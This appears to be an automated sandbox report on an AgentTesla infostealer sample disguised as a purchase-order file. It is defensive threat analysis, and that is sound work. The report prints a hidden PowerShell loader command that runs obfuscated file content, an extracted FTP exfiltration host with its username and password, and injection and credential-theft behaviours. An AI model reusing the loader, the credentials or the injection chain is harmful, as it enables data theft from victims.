Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
13/02/2024, 11:14
Static task
static1
Behavioral task
behavioral1
Sample
PO19223403.scr
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
PO19223403.scr
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
Pointment/Kreditgivninger/Campanulous/Blaamejses.ps1
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Pointment/Kreditgivninger/Campanulous/Blaamejses.ps1
Resource
win10v2004-20231215-en
General
-
Target
PO19223403.scr
-
Size
1019KB
-
MD5
1310b0c86f99ed198cfd1802cfabe1e6
-
SHA1
f9da789a0e49f7f0332c21e65f3f9fb746cfb82a
-
SHA256
bbdb2beee29b5cd7d145cf722ef633432ce5c229a9eba8048eb747e4fc10d5bb
-
SHA512
076eb43fc662d8a27a5528407bd9f42d93e916034cfd13d10c32c3e98573571fd232a26d04ac0a8f991f0d33361a532e2bb24f7b1752ee9c2abd5f47a13603a5
-
SSDEEP
24576:+sEChyXOAaCr9Ar9ssls+qRMcePSu41y4I7c9Ek+dv/h9Q8UnSBtv4YyU06:+mIimAJnsvp2IA/+x+d/ha8USBVf
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.hardblack-architects.co.za - Port:
21 - Username:
[email protected] - Password:
computer22@
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Loads dropped DLL 2 IoCs
pid Process 3472 PO19223403.scr 2572 Netherlandic.scr -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 api.ipify.org 27 ip-api.com 25 api.ipify.org -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\redressment\Drnke60.und PO19223403.scr File created C:\Windows\SysWOW64\Computing116\Gedeosten154.lnk PO19223403.scr -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2572 Netherlandic.scr -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4968 powershell.exe 2572 Netherlandic.scr -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4968 set thread context of 2572 4968 powershell.exe 94 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\entrada\phiallike.Dis PO19223403.scr -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\resources\udtrkkene\andalusisk.lnk PO19223403.scr -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 2572 Netherlandic.scr 2572 Netherlandic.scr -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4968 powershell.exe Token: SeDebugPrivilege 2572 Netherlandic.scr -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2572 Netherlandic.scr -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3472 wrote to memory of 4968 3472 PO19223403.scr 85 PID 3472 wrote to memory of 4968 3472 PO19223403.scr 85 PID 3472 wrote to memory of 4968 3472 PO19223403.scr 85 PID 4968 wrote to memory of 2572 4968 powershell.exe 94 PID 4968 wrote to memory of 2572 4968 powershell.exe 94 PID 4968 wrote to memory of 2572 4968 powershell.exe 94 PID 4968 wrote to memory of 2572 4968 powershell.exe 94 PID 4968 wrote to memory of 2572 4968 powershell.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\PO19223403.scr"C:\Users\Admin\AppData\Local\Temp\PO19223403.scr" /S1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Glandless=Get-Content 'C:\Users\Admin\AppData\Roaming\stress\Pointment\Kreditgivninger\Campanulous\Blaamejses.Hov';$Concurrences=$Glandless.SubString(54160,3);.$Concurrences($Glandless)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Users\Admin\AppData\Local\Temp\Netherlandic.scr"C:\Users\Admin\AppData\Local\Temp\Netherlandic.scr"3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2572
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1019KB
MD51310b0c86f99ed198cfd1802cfabe1e6
SHA1f9da789a0e49f7f0332c21e65f3f9fb746cfb82a
SHA256bbdb2beee29b5cd7d145cf722ef633432ce5c229a9eba8048eb747e4fc10d5bb
SHA512076eb43fc662d8a27a5528407bd9f42d93e916034cfd13d10c32c3e98573571fd232a26d04ac0a8f991f0d33361a532e2bb24f7b1752ee9c2abd5f47a13603a5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5c5b9fe538654a5a259cf64c2455c5426
SHA1db45505fa041af025de53a0580758f3694b9444a
SHA2567b51372117960e84d6f5eb3a26810cc044ff02283b3d656a0a456b0ab5cb8ea7
SHA512f0f8a5570c01b16e54f47502e867ffbaf162b44a847c0ffc8062d20e9492114229de5d9d2a836da256fd3f9fb493536bdbf148d5308695b16c0e98d20d8926aa
-
Filesize
338KB
MD532b8cdd3d9f618321fbe26a397b4aea0
SHA11942f56105b412781dc7a185f1ff3c3376e28550
SHA2560629f8138294683f4e131b88b4b5e589feca1d51ac58d76b1ec0aedd881106f0
SHA5121f37818be5cebca87e863b181e20e5c0689b9fc93dbde789aed388089e2c82673a55dc5c6ca47c537e75101c34dae9219b0a922baa1cce87ef626ff484ae9091
-
Filesize
52KB
MD58ff2c638f7da5e382ba3994d4ea5a0b9
SHA1c59f7e6b5fbdd2d79ec8c590e62f7b84e65c842a
SHA256838c2ef819f207ca24853cfcb596d83eb0ebb070e0593c999c0eb2f91a3433e1
SHA512d2084adba9817e3bfd4d09698f110c4ee2ca590864fbdfd7c2f815069df10093e853b80a7c575c4a1127c9f90b507f2df7c6ca371440ca45c984c7f585f54527